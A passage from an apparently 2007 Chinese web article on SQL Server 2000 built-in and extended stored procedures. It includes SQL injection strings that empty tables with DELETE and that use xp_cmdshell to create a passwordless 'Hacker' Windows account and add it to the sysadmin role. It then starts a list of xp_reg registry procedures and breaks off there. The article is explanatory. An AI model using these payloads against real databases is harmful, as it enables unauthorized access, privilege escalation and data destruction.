打印本文 打印本文 关闭窗口 关闭窗口
SQLSERVER2000一些内置存储过程用法和说明
作者:武汉SEO闵涛  文章来源:敏韬网  点击数13619  更新时间:2007/11/14 12:27:07  文章录入:mintao  责任编辑:mintao
资料表名称>--

抑或是以 DELETE 清空资料表:

'''' ;DELETE FROM <资料表名称>--

使用进阶且功能强悍的延伸预存程序

这一类的预存程序多以 xp_ 开头,存放在 master 系统数据库的延伸预存程序中。有趣的是大部分的延伸预存程序在 SQL Server 所附的线上说明中都没有列出来,也没有说明。笔者本想到微软网站利用全文检索找寻这些延伸预存程序的蛛丝马迹,以列表讨论,但发现大多是无可奉告(undocumented),看来延伸预存程序虽然功能强大,但微软并不鼓励大家使用。
笔者选几个较有趣的分别介绍。

执行其它应用程序

xp_cmdshell 应该是大家最常使用的延伸预存程序之一,透过这个延伸预存程序可以 SQL Server 的系统帐号来执行任何应用程序。

以下程序代码列表 1 直接利用操作系统所附的 NET 工具程序,在 Windows 系统中加入一个使用者帐号 Hacker ;没有密码,并将该帐号加到 SQL Server,再放入到最大的使用者权力群组 sysadmin

'''' ; EXEC MASTER..XP_CMDSHELL ''''net user Hacker /add'''' EXEC MASTER..SP_GRANTLOGIN ''''BYRON-XP\Hacker'''' EXEC MASTER..SP_ADDSRVROLEMEMBER ''''BYRON-XP\Hacker'''',''''sysadmin''''--

程序代码列表 1:加入自订的使用者,并赋予该帐号最大的权限。

若你还开放网际网络存取 SQL Server预设使用的 TCP 1433 埠,则骇客将有机会唐而皇之地控管 SQL Server

Registry 相关的系统预存程序

SQL Server 提供了大量与 Registry 相关的延伸预存程序,以 xp_reg 开头作为代表2。内容有:

xp_regaddmultistring
xp_re

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ...  下一页 >> 

打印本文 打印本文 关闭窗口 关闭窗口